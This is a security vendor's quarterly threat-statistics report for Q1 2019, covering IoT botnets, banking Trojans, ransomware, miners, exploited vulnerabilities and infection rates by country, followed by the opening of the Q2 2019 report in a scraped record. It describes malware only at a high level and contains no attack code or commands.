IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. \n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Verdict | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware downloaded of victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p\n\n## Financial threats\n\n### Quarterly highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&amp;C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 | \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 | \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that in-depth attacks for browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>. To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability exploited race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in Use-After-Free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24,16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17,17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46,16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44,14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43,17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.", "cvss3": {}, "published": "2019-05-23T10:00:53", "type": "securelist", "title": "IT threat evolution Q1 2019. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2018-20250", "CVE-2019-0797", "CVE-2019-0808", "CVE-2019-5786"], "modified": "2019-05-23T10:00:53", "id": "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "href": "https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-19T18:27:50", "description": "\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 717,057,912 attacks launched from online resources in 203 countries across the globe.\n * 217,843,293 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 228,206 users.\n * Ransomware attacks were defeated on the computers of 232,292 unique users.\n * Our File Anti-Virus detected 240,754,063 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 753,550 malicious installation packages\n * 13,899 installation packages for mobile banking Trojans\n * 23,294 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Quarterly highlights\n\nQ2 2019 will be remembered for several events.\n\nFirst, we uncovered a large-scale [financial threat by the name of Riltok](<https://securelist.com/mobile-banker-riltok/91374/>), which targeted clients of not only major Russian banks, but some foreign ones too.\n\nSecond, we detected the new Trojan.AndroidOS.MobOk malware, tasked with stealing money from mobile accounts through exploiting WAP-Click subscriptions. After infection, web activity on the victim device went into overdrive. In particular, the Trojan opened specially created pages, bypassed their CAPTCHA system using a third-party service, and then clicked on the necessary buttons to complete the subscription.\n\nThird, we repeated our [study](<https://securelist.com/beware-of-stalkerware/90264/>) of commercial spyware, a.k.a. stalkerware. And although such software is not malicious in the common sense of the word, it does entail certain risks for victims. So as of April 3, 2019, Kaspersky mobile products for Android notify users of all known commercial spyware.\n\nFourth, we managed to discover a new type of adware app (AdWare.AndroidOS.KeepMusic.a and AdWare.AndroidOS.KeepMusic.b verdicts) that bypasses operating system restrictions on apps running in the background. To stop its thread being terminated, one such adware app launches a music player and plays a silent file. The operating system thinks that the user is listening to music, and does not end the process, which is not displayed on the main screen of the device. At this moment, the device is operating as part of a botnet, supposedly showing ads to the victim. \"Supposedly\" because ads are also shown in background mode, when the victim might not be using the device.\n\nFifth, our attention was caught by the Hideapp family of Trojans. These Trojans spread very actively in Q2, including by means of a time-tested distribution mechanism: antivirus solution logos and porn apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153149/it-threat-evolution-q2-2019-statistics-1.png>)\n\nFinally, in some versions, the Trojan creators revealed a less-than-positive attitude to managers of one of Russia's largest IT companies:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153203/it-threat-evolution-q2-2019-statistics-2.png>)\n\n### Mobile threat statistics\n\nIn Q2 2019, Kaspersky detected 753,550 malicious installation packages, which is 151,624 fewer than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153226/it-threat-evolution-q2-2019-statistics-3.png>)\n\nWhat's more, this is almost 1 million fewer than the number of malicious installation packages detected in Q2 2018. Over the course of this year, we have seen a steady decline in the amount of new mobile malware. The drop is the result of less cybercriminal activity in adding members to the most common families. \n\n### Distribution of detected mobile apps by type\n\n_Distribution of newly detected mobile apps by type, Q1 and Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153256/it-threat-evolution-q2-2019-statistics-4.png>)\n\nAmong all the threats detected in Q2 2019, the lion's share went to potentially unsolicited RiskTool apps with 41.24%, which is 11 p.p. more than in the previous quarter. The malicious objects most frequently encountered came from the RiskTool.AndroidOS.Agent family (33.07% of all detected threats in this class), RiskTool.AndroidOS.Smssend (15.68%), and RiskTool.AndroidOS.Wapron (14.41%).\n\nIn second place are adware apps, their share having increased by 2.16 p.p. to 18.71% of all detected threats. Most often, adware belonged to the AdWare.AndroidOS.Ewind family (26.46% of all threats in this class), AdWare.AndroidOS.Agent (23.60%), and AdWare.AndroidOS.MobiDash (17.39%).\n\nTrojan-class malware (11.83%) took third place, with its share for the quarter climbing by 2.31 p.p. The majority of detected files belonged to the Trojan.AndroidOS.Boogr family (32.42%) \u2013 this verdict was given to Trojans detected with machine-learning tools. Next come the Trojan.AndroidOS.Hiddapp (24.18%), Trojan.AndroidOS.Agent (14.58%), and Trojan.AndroidOS.Piom (9.73%) families. Note that Agent and Piom are aggregating verdicts that cover a range of Trojan specimens from various developers.\n\nThreats in the Trojan-Dropper class (10.04%) declined noticeably, shedding 15 p.p. Most of the files we detected belonged to the Trojan-Dropper.AndroidOS.Wapnor family (71% of all detected threats in this class), while no other family claimed more than 3%. A typical member of the Wapnor family consists of a random pornographic image, a polymorphic dropper, and a unique executable file. The task of the malware is to sign the victim up to a WAP subscription.\n\nIn Q2 2019, the share of detected mobile bankers slightly decreased: 1.84% versus 3.21% in Q1. The drop is largely due to a decrease in the generation of Trojans in the [Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) family. The most frequently created objects belonged to the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/the-android-trojan-svpeng-now-capable-of-mobile-phishing/57301/>) (30.79% of all detected mobile bankers), Trojan-Banker.AndroidOS.Wroba (17.16%), and Trojan-Banker.AndroidOS.Agent (15.70%) families.\n\n### Top 20 mobile malware programs\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs related to RiskTool or adware._\n\n| Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 44.37 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.31 \n3 | DangerousObject.AndroidOS.GenericML | 5.66 \n4 | Trojan.AndroidOS.Hiddapp.cr | 4.77 \n5 | Trojan.AndroidOS.Hiddapp.ch | 4.17 \n6 | Trojan.AndroidOS.Hiddapp.cf | 2.81 \n7 | Trojan.AndroidOS.Hiddad.em | 2.53 \n8 | Trojan-Dropper.AndroidOS.Lezok.p | 2.16 \n9 | Trojan-Dropper.AndroidOS.Hqwar.bb | 2.08 \n10 | Trojan-Banker.AndroidOS.Asacub.a | 1.93 \n11 | Trojan-Banker.AndroidOS.Asacub.snt | 1.92 \n12 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.91 \n13 | Trojan.AndroidOS.Hiddapp.cg | 1.89 \n14 | Trojan.AndroidOS.Dvmap.a | 1.88 \n15 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.86 \n16 | Trojan.AndroidOS.Agent.rt | 1.81 \n17 | Trojan-SMS.AndroidOS.Prizmes.a | 1.58 \n18 | Trojan.AndroidOS.Fakeapp.bt | 1.58 \n19 | Trojan.AndroidOS.Agent.eb | 1.49 \n20 | Exploit.AndroidOS.Lotoor.be | 1.46 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked._\n\nAs per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (44.77%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nSecond and third places were claimed by Trojan.AndroidOS.Boogr.gsh (11.31%) and DangerousObject.AndroidOS.GenericML (5.66%). These verdicts are assigned to files recognized as malicious by our [machine-learning systems](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nFourth, fifth, sixth, seventh, and thirteenth places were taken by members of the Trojan.AndroidOS.Hiddapp family, whose task is to secretly download ads onto the infected device. If the user detects the adware app, the Trojan does not prevent its deletion, but re-installs the app at the first opportunity.\n\nEighth position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.16%). This Trojan displays persistent ads, steals money through SMS subscriptions, and inflates hit counters for apps on various platforms.\n\nNinth and fifteenth places were taken by members of the Hqwar dropper family (2.08% and 1.86%, respectively); this malware most often conceals banking 